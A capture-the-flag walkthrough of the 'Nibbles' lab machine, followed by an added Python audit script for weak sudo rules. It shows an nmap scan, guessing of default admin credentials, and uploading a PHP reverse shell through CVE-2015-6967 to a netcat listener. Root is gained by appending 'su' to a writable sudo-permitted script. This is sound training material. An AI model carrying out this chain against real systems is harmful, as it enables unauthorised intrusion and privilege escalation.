As always, we start with an nmap against the machine’s IP.
$ nmap -sC -sV 10.10.10.75
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-27 19:04 BST
Nmap scan report for 10.10.10.75
Host is up (0.067s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.29 seconds
As you can see, there’s an SSH service and a web service running. Head over to the web service with your browser and you’ll see a ‘hello world’ page.
Inspect the page and there’s an HTML comment that mentions ‘/nibbleblog/’, so navigate to that URL: http://10.10.10.75/nibbleblog/
Nibble Blog is a simple blogging web application. Searching for vulnerabilities online, you should come across CVE-2015-6967, but we need a login to be able to perform the exploit. A little more searching and you can easily find the default login page for this app: http://10.10.10.75/nibbleblog/admin.php
Getting the credentials is very easy and just requires a little bit of guess work.
What’s the default admin username for most applications? admin.
What word is used a lot on this machine? nibbles.
Chuck those credentials in to the admin page and you should be logged in to the dashboard.
Nibble Blog Exploit
Details of the exploit can be found on Curesec Research Team’s website. What it does is basically take anything you upload using the My Image plugin and save it as image.php, meaning it’s available for execution from within the browser.
To leverage this exploit, we’ll use pentestmonkey’s PHP Reverse Shell script to get a reverse shell.
Start up netcat with your chosen port to listen on, e.g. nc -lvnp 4447.
Change the IP and Port in the PHP script to match your IP address and the port you’re listening on with Netcat. Save, then navigate to the My Image plugin in the Nibble Blog dashboard and upload. Ignore the errors.
Now, hitting the content that’s just been uploaded requires a little digging into the Nibble Blog code, or you could look at the Curesec Research Team’s code snippet to see what’s going on. Basically each plugin appears to get its own ‘space’ to store files. This plugin uses that space and saves the file as image.php. The plugin file storage directory is /content/private/plugins/my_image/. Put the two together and you should hit a page which seems to take forever to load; however, check your netcat listener and you should see you now have a reverse shell! Check the user’s home directory for the first flag.
First we’ll run sudo -l to see what sudo access the current user has.
$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
We can see that the user is able to run /home/nibbler/personal/stuff/monitor.sh as root without a password. So let’s head over there and investigate.
$ cd /home/nibbler
$ ls
personal.zip  user.txt
There’s no personal directory, but there is a zip. Extract the zip and you’ll see that it extracts the directories and file that we’re looking for. Excellent.
$ unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh
$ ls
personal  personal.zip  user.txt
$ cd personal/stuff
Since we’re able to run this shell script as root, let’s inject a simple su command, which will switch us to the root user. Use chmod to set the file as executable and then run it.
>> appends to a file, whereas > replaces the contents of a file.
$ echo "su" >> monitor.sh
$ chmod +x monitor.sh
$ sudo /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
'unknown': I need something more specific.
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
ls
monitor.sh
whoami
root
BOOM! We’re now root. Head to the root directory to collect your prize.
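The root cause of that last step is a sudo rule pointing at a script the user can edit. As an added example (not part of the original writeup), here is a small Python audit that parses `sudo -l` output like the one above and flags any rule that runs a command as root from a path that is not under root’s sole control; the sample output is the one from this box, embedded as a constructed string.

```python
import os
import re
import stat

# A `sudo -l` rule line, e.g. "(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>/\S+)")

# Constructed sample: the `sudo -l` output shown in this writeup.
SAMPLE_SUDO_L = """\
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

def parse_sudo_rules(sudo_l_output):
    """Return (runas_user, nopasswd, command_path) for each rule line."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if m:
            runas_user = m.group("runas").split(":")[0].strip()  # "(root : root)" -> "root"
            rules.append((runas_user, "NOPASSWD:" in m.group("tags"), m.group("cmd")))
    return rules

def writable_by_unprivileged(path):
    """True if the command, or any directory above it, is not under root's sole
    control: owned by a non-root uid, group/world writable, or missing/unreadable
    (whoever can create or replace it decides what sudo will run as root)."""
    current = os.path.realpath(path)
    while True:
        try:
            st = os.stat(current)
        except OSError:
            return True
        if st.st_uid != 0 or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            return True
        parent = os.path.dirname(current)
        if parent == current:      # reached "/" without finding a weak link
            return False
        current = parent

def audit_sudo_rules(sudo_l_output):
    """List the root-level rules whose target a non-root user could tamper with."""
    return [cmd for runas, _nopw, cmd in parse_sudo_rules(sudo_l_output)
            if runas in ("root", "ALL") and writable_by_unprivileged(cmd)]

if __name__ == "__main__":
    for cmd in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"WEAK sudo rule: {cmd} runs as root but is not root-controlled")
```

The fix on a real host is the same in every case the audit flags: move the script to a root-owned, root-writable-only location (for example under /usr/local/sbin) and point the sudoers rule at that copy.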